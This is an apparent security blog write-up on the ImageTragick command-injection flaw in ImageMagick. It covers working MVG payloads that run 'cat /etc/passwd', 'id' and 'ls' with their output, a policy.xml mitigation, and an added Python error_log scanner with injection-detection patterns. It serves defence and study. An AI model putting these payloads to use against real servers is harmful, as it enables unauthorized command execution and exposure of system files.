updated 2016-05-09
ImageMagick has a vulnerability known as ImageTragick.
ImageMagick is a library, toolset and set of programs for image processing; it can enlarge or shrink images, or convert them to other formats (png / jpg, etc.).
(image taken from ImageTragick)
Attack method
vi imagetragick.mvg
viewbox 0 0 1 1 image over 0,0 0,0 'https://voidsec.com/" || cat /etc/passwd && echo "0'
Generate the image file
convert imagetragick.mvg output.png
The result dumps the contents of the system file:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
(omitted)
0
convert: no decode delegate for this image format `/tmp/magick-k-R1Wh1d' @ error/constitute.c/ReadImage/566.
Or
vi imagetragick2.mvg
push graphic-context
viewbox 0 0 640 480
fill 'url(https://voidsec.com/logo.png"|cat "/etc/passwd)'
pop graphic-context
identify imagetragick2.mvg
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
(omitted)
identify: unrecognized color `https://voidsec.com/logo.png"|cat "/etc/passwd' @ warning/color.c/GetColorCompliance/947.
identify: no decode delegate for this image format `/tmp/magick-N_zPwgrX' @ error/constitute.c/ReadImage/566.
imagetragick2.mvg MVG 640x480 640x480+0+0 16-bit DirectClass 121B 0.000u 0:00.109
identify: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3145.
The above prints passwd; ls works just as well:
convert 'https://example.com"|ls "-la' out.png
Mitigation (the current patch does not fully fix the issue, so for now this is the workaround)
vi /etc/ImageMagick/policy.xml
# add the following
<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>
Before the change
convert -list policy
Path: [built-in]
  Policy: Undefined
    rights: None
After the change
Path: [built-in]
  Policy: Undefined
    rights: None
Path: /etc/ImageMagick/policy.xml
  Policy: Coder
    rights: None
    pattern: EPHEMERAL
  Policy: Coder
    rights: None
    pattern: URL
  Policy: Coder
    rights: None
    pattern: HTTPS
  Policy: Coder
    rights: None
    pattern: MVG
  Policy: Coder
    rights: None
    pattern: MSL
  Policy: Coder
    rights: None
    pattern: TEXT
  Policy: Coder
    rights: None
    pattern: SHOW
  Policy: Coder
    rights: None
    pattern: WIN
  Policy: Coder
    rights: None
    pattern: PLT
Running the convert command above now no longer works:
convert: not authorized `imagetragick.mvg' @ error/constitute.c/ReadImage/453.
convert: missing an image filename `output.png' @ error/convert.c/ConvertImageCommand/3015.
Alternatively, you can test with the /PoCs repository (see the references).
If you use the PHP imagick module, it also uses ImageMagick underneath, so the same vulnerability risk exists.
However, I have not yet been able to reproduce the result above (the one produced from the command line) this way.
<?php
header('Content-type: image/jpeg');
#$imagick = new Imagick('logo.jpg');
$imagick = new Imagick('imagetragick.mvg');
$imagick->thumbnailImage(200, 200);
$imagick->setImageFormat('png');
$imagick->writeImage('output.png');
echo $imagick;
?>
PS: with the policy in place, normal image generation still works as before.
References
http://www.1990day.com/2016/05/05/ImageMagick-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2016-3714/
https://github.com/ImageTragick/PoCs
https://imagetragick.com/
I tried another variant (from the reference):
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context
Using the same command-line approach you can see the output of id.
But the web page still returns no result.
However, in Apache's error_log you can see:
sh: : command not found
httpd: unrecognized color `https://"|id; "' @ warning/color.c/GetColorCompliance/947.
httpd: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1057.
httpd: no decode delegate for this image format `/tmp/magick-RkBqItD9' @ error/constitute.c/ReadImage/566.
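Since the web request itself returns nothing, the error_log is where this shows up. The following is an added example, not part of the original post, that scans error_log lines for exactly these signatures: a shell spawned by the image library (`sh: ... command not found`) and an `unrecognized color` value that contains shell metacharacters. The sample lines are constructed after the ones above.

```python
import re

# Constructed sample, modelled on the Apache error_log lines shown above
# (not a real capture); the last line is a harmless typo for contrast.
SAMPLE_ERROR_LOG = """\
sh: : command not found
httpd: unrecognized color `https://"|id; "' @ warning/color.c/GetColorCompliance/947.
httpd: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1057.
httpd: no decode delegate for this image format `/tmp/magick-RkBqItD9' @ error/constitute.c/ReadImage/566.
httpd: unrecognized color `ligthgoldenrod' @ warning/color.c/GetColorCompliance/947.
"""

# ImageMagick quotes the offending value between a backtick and a single quote.
_UNRECOGNIZED_COLOR = re.compile(r"unrecognized color `(?P<value>.*?)' @ ")
_DELEGATE_FAILED = re.compile(r"delegate failed `(?P<cmd>.*?)' @ ")
# Characters that never belong in a colour name or an image URL but are what
# the delegate injection relies on (closing quote, pipe, command separator).
_SHELL_META = re.compile(r'["`|;&$<>(){}]')

def suspicious_lines(text):
    """Return (line_number, severity, reason) for error_log lines that look
    like an ImageTragick delegate injection attempt or its side effects."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("sh: ") and "command not found" in line:
            # The image library spawned a shell that choked on injected text.
            findings.append((lineno, "high", "shell spawned during image processing"))
            continue
        m = _UNRECOGNIZED_COLOR.search(line)
        if m and _SHELL_META.search(m.group("value")):
            findings.append((lineno, "high", "shell metacharacters in colour value: " + m.group("value")))
            continue
        m = _DELEGATE_FAILED.search(line)
        if m:
            # Not malicious on its own, but shows a URL coder reached the shell delegate.
            findings.append((lineno, "info", "external delegate invoked: " + m.group("cmd")))
    return findings

if __name__ == "__main__":
    for lineno, severity, reason in suspicious_lines(SAMPLE_ERROR_LOG):
        print(f"line {lineno} [{severity}] {reason}")
```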